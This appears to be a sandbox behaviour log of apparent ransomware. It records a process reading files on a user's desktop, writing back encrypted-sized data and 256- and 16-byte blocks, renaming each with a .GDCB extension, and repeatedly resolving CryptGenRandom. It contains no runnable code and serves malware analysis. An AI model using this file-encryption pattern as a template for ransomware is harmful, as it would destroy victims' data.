File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\8g6mIA 6.pptx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\8g6mIA 6.pptx, size = 1048576, size_out = 36285 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\8g6mIA 6.pptx, size = 36288 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\8g6mIA 6.pptx, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\8g6mIA 6.pptx, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\8g6mIA 6.pptx, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\8g6mIA 6.pptx.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\lFbogup.mp3, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\lFbogup.mp3, size = 1048576, size_out = 75412 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\lFbogup.mp3, size = 75424 True 1
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\lFbogup.mp3, size = 256 True 2
Fn
Data
File Write filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\lFbogup.mp3, size = 16 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\lFbogup.mp3, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\lFbogup.mp3.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\L_GiUm\9Vo634VvEY9vGOHOlzG.mkv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\L_GiUm\9Vo634VvEY9vGOHOlzG.mkv, size = 1048576, size_out = 43602 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\L_GiUm\9Vo634VvEY9vGOHOlzG.mkv, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\L_GiUm\9Vo634VvEY9vGOHOlzG.mkv.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\L_GiUm\jS0e PAHtzszw9mdks.wav, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\L_GiUm\jS0e PAHtzszw9mdks.wav, size = 1048576, size_out = 29960 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\L_GiUm\jS0e PAHtzszw9mdks.wav, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\L_GiUm\jS0e PAHtzszw9mdks.wav.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\L_GiUm\ORNdnmfJCdFA1es0enx.flv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\L_GiUm\ORNdnmfJCdFA1es0enx.flv, size = 1048576, size_out = 90954 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\L_GiUm\ORNdnmfJCdFA1es0enx.flv, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\L_GiUm\ORNdnmfJCdFA1es0enx.flv.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\L_GiUm\oWXZt UxeIOr.mp3, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\L_GiUm\oWXZt UxeIOr.mp3, size = 1048576, size_out = 25775 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\L_GiUm\oWXZt UxeIOr.mp3, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\L_GiUm\oWXZt UxeIOr.mp3.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\mxHA9QwX60.mp4, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\mxHA9QwX60.mp4, size = 1048576, size_out = 67531 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\mxHA9QwX60.mp4, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\0eErT0ljWw1qHv\mxHA9QwX60.mp4.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\210AtVavnZ- J.avi, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\210AtVavnZ- J.avi, size = 1048576, size_out = 71750 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\210AtVavnZ- J.avi, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\210AtVavnZ- J.avi.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\4wEn.jpg, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\4wEn.jpg, size = 1048576, size_out = 65149 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\4wEn.jpg, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\4wEn.jpg.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\8Frf.flv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\8Frf.flv, size = 1048576, size_out = 15058 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\8Frf.flv, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\8Frf.flv.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\8UW6wrCE2.xlsx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\8UW6wrCE2.xlsx, size = 1048576, size_out = 82402 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\8UW6wrCE2.xlsx, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\8UW6wrCE2.xlsx.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\8ysUM-7H.mkv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\8ysUM-7H.mkv, size = 1048576, size_out = 67764 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\8ysUM-7H.mkv, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\8ysUM-7H.mkv.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\aWlcbVjj2 N5W7gRzUu\DJJGr.wav, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\aWlcbVjj2 N5W7gRzUu\DJJGr.wav, size = 1048576, size_out = 83805 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\aWlcbVjj2 N5W7gRzUu\DJJGr.wav, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\aWlcbVjj2 N5W7gRzUu\DJJGr.wav.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\aWlcbVjj2 N5W7gRzUu\E3nwHKKhrNc.avi, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\aWlcbVjj2 N5W7gRzUu\E3nwHKKhrNc.avi, size = 1048576, size_out = 58231 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\aWlcbVjj2 N5W7gRzUu\E3nwHKKhrNc.avi, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\aWlcbVjj2 N5W7gRzUu\E3nwHKKhrNc.avi.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\aWlcbVjj2 N5W7gRzUu\m mArdoH QZh2LspL.pptx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\aWlcbVjj2 N5W7gRzUu\m mArdoH QZh2LspL.pptx, size = 1048576, size_out = 79185 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\aWlcbVjj2 N5W7gRzUu\m mArdoH QZh2LspL.pptx, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\aWlcbVjj2 N5W7gRzUu\m mArdoH QZh2LspL.pptx.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\aWlcbVjj2 N5W7gRzUu\pCAr B4s-Dnk.avi, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\aWlcbVjj2 N5W7gRzUu\pCAr B4s-Dnk.avi, size = 1048576, size_out = 36534 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\aWlcbVjj2 N5W7gRzUu\pCAr B4s-Dnk.avi, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\aWlcbVjj2 N5W7gRzUu\pCAr B4s-Dnk.avi.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\aWlcbVjj2 N5W7gRzUu\Slrus_KiV.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\aWlcbVjj2 N5W7gRzUu\Slrus_KiV.gif, size = 1048576, size_out = 41367 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\aWlcbVjj2 N5W7gRzUu\Slrus_KiV.gif, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\aWlcbVjj2 N5W7gRzUu\Slrus_KiV.gif.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\aWlcbVjj2 N5W7gRzUu\ZdIFxnCVv1avem R.png, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\aWlcbVjj2 N5W7gRzUu\ZdIFxnCVv1avem R.png, size = 1048576, size_out = 57418 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\aWlcbVjj2 N5W7gRzUu\ZdIFxnCVv1avem R.png, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\aWlcbVjj2 N5W7gRzUu\ZdIFxnCVv1avem R.png.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\BbF8suj7aJrWr.mp4, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\BbF8suj7aJrWr.mp4, size = 1048576, size_out = 71389 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\BbF8suj7aJrWr.mp4, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\BbF8suj7aJrWr.mp4.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\brfsFSSqM P0x3ZmWLa7.mp4, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\brfsFSSqM P0x3ZmWLa7.mp4, size = 1048576, size_out = 95161 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\brfsFSSqM P0x3ZmWLa7.mp4, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\brfsFSSqM P0x3ZmWLa7.mp4.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\C53kh.swf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\C53kh.swf, size = 1048576, size_out = 14136 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\C53kh.swf, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\C53kh.swf.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\Dzbrs.pdf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\Dzbrs.pdf, size = 1048576, size_out = 100141 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\Dzbrs.pdf, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\Dzbrs.pdf.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\EP7RDgDUv zXYJnd.xlsx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\EP7RDgDUv zXYJnd.xlsx, size = 1048576, size_out = 34634 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\EP7RDgDUv zXYJnd.xlsx, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\EP7RDgDUv zXYJnd.xlsx.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\FklQtdWtufGJ1mB.flv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\FklQtdWtufGJ1mB.flv, size = 1048576, size_out = 17446 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\FklQtdWtufGJ1mB.flv, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\FklQtdWtufGJ1mB.flv.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\HkP-y.wav, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\HkP-y.wav, size = 1048576, size_out = 10778 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\HkP-y.wav, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\HkP-y.wav.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Users\CIiHmnxMn6Ps\Desktop\jdhLD2CDd5WY7.avi, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Users\CIiHmnxMn6Ps\Desktop\jdhLD2CDd5WY7.avi, size = 1048576, size_out = 81107 True 1
Fn
Data
File Move source_filename = C:\Users\CIiHmnxMn6Ps\Desktop\jdhLD2CDd5WY7.avi, destination_filename = C:\Users\CIiHmnxMn6Ps\Desktop\jdhLD2CDd5WY7.avi.GDCB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
